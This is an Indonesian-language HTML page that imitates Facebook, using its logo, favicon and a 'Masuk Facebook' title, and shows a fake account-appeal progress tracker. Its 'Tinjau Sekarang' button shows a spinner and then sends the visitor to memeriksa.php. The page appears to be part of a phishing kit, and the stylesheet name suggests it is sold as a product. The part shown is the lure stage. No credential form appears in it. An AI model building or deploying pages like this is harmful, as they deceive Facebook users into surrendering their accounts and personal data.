<!DOCTYPE html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, shrink-to-fit=no"
    />

    <!-- Bootstrap CSS -->
    <link
      href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css"
      rel="stylesheet"
      integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC"
      crossorigin="anonymous"
    />
    <link rel="shortcut icon" href="https://upload.wikimedia.org/wikipedia/commons/thumb/5/51/Facebook_f_logo_%282019%29.svg/480px-Facebook_f_logo_%282019%29.svg.png" type="image/x-icon">
    <link rel="stylesheet" href="assets/wahyustore.css" />
    <title>Masuk | Masuk Facebook</title>
    <style>
        

        .bounce {
            width: 200px; /* Ukuran gambar */
            height: auto;
            animation: bounce 2s infinite; /* Efek bounce */
        }

        /* Keyframes untuk bounce */
        @keyframes bounce {
            0%, 100% {
                transform: translateY(0); /* Posisi awal */
            }
            50% {
                transform: translateY(-30px); /* Melompat ke atas */
            }
        /* Layer loading */
    .loading-overlay {
      position: fixed; /* Menutupi layar penuh */
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      background-color: rgba(0, 0, 0, 0.7); /* Warna hitam transparan */
      display: flex;
      justify-content: center;
      align-items: center;
      z-index: 9999; /* Prioritas tertinggi */
    }

    .loading-overlay.hidden {
      display: none; /* Tersembunyi secara default */
    }

    .spinner {
      width: 50px;
      height: 50px;
      border: 5px solid rgba(255, 255, 255, 0.3); /* Border transparan */
      border-top-color: white; /* Bagian atas putih */
      border-radius: 50%; /* Membuat lingkaran */
      animation: spin 1s linear infinite; /* Efek rotasi */
    }

    @keyframes spin {
      from {
        transform: rotate(0deg);
      }
      to {
        transform: rotate(360deg);
      }
    }

    /* Konten Utama */
    .content {
      padding: 20px;
      text-align: center;
    }
    
    .spinner-border {
        width: 1rem;
        height: 1rem;
        border-width: 1px;
      }
      
      .note-text {
    font-size: 8px;
    color: #777; /* Warna teks lebih muda */
    margin-bottom: 15px; /* Jarak antara teks kecil dan tombol */
    display: block;
    text-align: center;
}
  </style>
  </head>
  <body>
      <!-- Layer Loading -->
  <div class="loading-overlay" id="loadingOverlay">
    <div class="spinner"></div>
  </div>
    <div class="container">
      <header>
        <nav>
          <div>
            <img src="img/logometa.png" width="30%" alt="Facebook Logo" />
          </div>
          <ul class="menu">
            <li><a href="#">Bantuan</a></li>
          </ul>
        </nav>
      </header>
      <div class="row1">
        <center>
            
          

          <h3 class="formh3"><img src="https://petapixel.com/assets/uploads/2023/04/facebook-contact-support-featured.jpg" width="100%" alt="Facebook Logo" /></h3>
        </center><br>
        <div class="form-check">
          <input class="form-check-input" type="radio" name="flexRadioDisabled" id="flexRadioDisabled" checked>
          <label class="form-check-label" for="flexRadioDesabled">
            Pengajuan
          </label>
          <p class="loading" id="loading">Pengajuan Banding anda sudah terkirim..</p>
        </div>
        <div class="form-check">
          <input class="form-check-input" type="radio" name="flexRadioDefault" id="flexRadioDefault2" disabled>
          <label class="form-check-label" for="flexRadioDefault1">
            sedang ditinjau
          </label>
          

    <script>
        const loadingText = document.getElementById('loading');
        let dots = 0;

        setInterval(() => {
            dots = (dots + 1) % 4; // Mengulang dari 0 sampai 3
            loadingText.textContent = 'Pengajuan Banding anda sudah Terkirim' + '.'.repeat(dots);
        }, 500);
    </script>
        </div>
        <div class="form-check">
          <input class="form-check-input" type="radio" name="flexRadioDisabled"
          id="flexRadioDisabled" disabled>
          <label class="form-check-label" for="flexRadioDefault1">
            Selesai
          </label>
          
        </div>
        
      <footer>
       <center style="font-size: 13px; color: #808080">Klik Tinjau Sekarang untuk melanjutkan proses ini</center>
        <button id="reviewButton" class="btn btn-primary" onclick="showSpinnerAndRedirect()">
          Tinjau Sekarang
        </button>
      </footer>
    </div>
    <script>
      function showSpinnerAndRedirect() {
        const button = document.getElementById("reviewButton");

        // Simpan konten tombol asli
        const originalContent = button.innerHTML;

        // Ganti konten tombol dengan spinner
        button.innerHTML = `
          <div class="spinner-border text-light" role="status">
            <span class="visually-hidden">Loading...</span>
          </div>
        `;
        button.disabled = true; // Nonaktifkan tombol selama loading

        // Tunggu 5 detik sebelum redirect
        setTimeout(() => {
          window.location.href = "memeriksa.php"; // Arahkan ke halaman tujuan
        }, 5000);

        // Pulihkan tombol setelah selesai (opsional, jika redirect gagal)
        setTimeout(() => {
          button.innerHTML = originalContent;
          button.disabled = false;
        }, 5000);
      }
    </script>
    
  </body>
</html>
